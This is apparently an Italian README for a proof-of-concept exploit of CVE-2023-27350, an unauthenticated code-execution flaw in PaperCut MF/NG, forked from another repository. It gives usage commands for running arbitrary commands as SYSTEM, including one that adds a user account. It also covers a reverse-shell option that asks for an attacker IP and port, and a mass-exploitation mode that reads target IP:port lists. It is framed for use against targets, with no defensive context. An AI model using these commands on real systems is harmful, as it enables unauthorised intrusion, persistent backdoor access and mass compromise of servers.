
Exploit per Papercut CVE-2023-27350. [+] Reverse shell [+] Controllo di massa
Questo è un exploit Proof of Concept (POC) per CVE-2023-27350, una vulnerabilità presente in PaperCut MF/NG che consente a un attaccante non autenticato di eseguire codice arbitrario con privilegi SYSTEM.
Prima di usare questo exploit, assicurati di aver installato le seguenti librerie:
pip install -r requirements.txt
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]
-u, --url: L'URL dell'applicazione PaperCut MF/NG target (es., http://target-ip:9191).-c, --command: Il comando da eseguire sul sistema target.--reverse-shell: Usa un payload reverse shell per eseguire comandi sul sistema target.-f, --file: Controlla più target da un file (es., file.txt).Per eseguire un comando sul sistema target, usa l'opzione -c:
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"
Per usare un payload reverse shell per eseguire comandi sul sistema target, usa l'opzione --reverse-shell. Ti verrà chiesto di inserire il tuo indirizzo IP e il numero di porta:
python exploit.py -u http://target-ip:9191 --reverse-shell
Enter your IP address: <attacker-ip>
Enter your port number: <port>
Per controllare più target da un file, usa l'opzione -f. Il formato del file deve essere ip_address:port:
python CVE-2023-27350.py -f file.txt
file.txtQuando usi l'opzione di controllo di massa con l'input file.txt, assicurati che il contenuto del file sia formattato correttamente.
Ogni riga del file deve contenere l'indirizzo IP e il numero di porta di un target, separati da due punti :. Per esempio:
110.175.19.78:9191
110.175.19.78:80
192.168.1.1:8080
Assicurati che non ci siano spazi o caratteri extra tra l'indirizzo IP, i due punti e il numero di porta. Assicurati inoltre che ogni riga contenga solo un indirizzo IP e un numero di porta.
Questo è un fork del repository horizon3ai/CVE-2023-27350. Tutti i crediti per l'exploit originale vanno agli autori.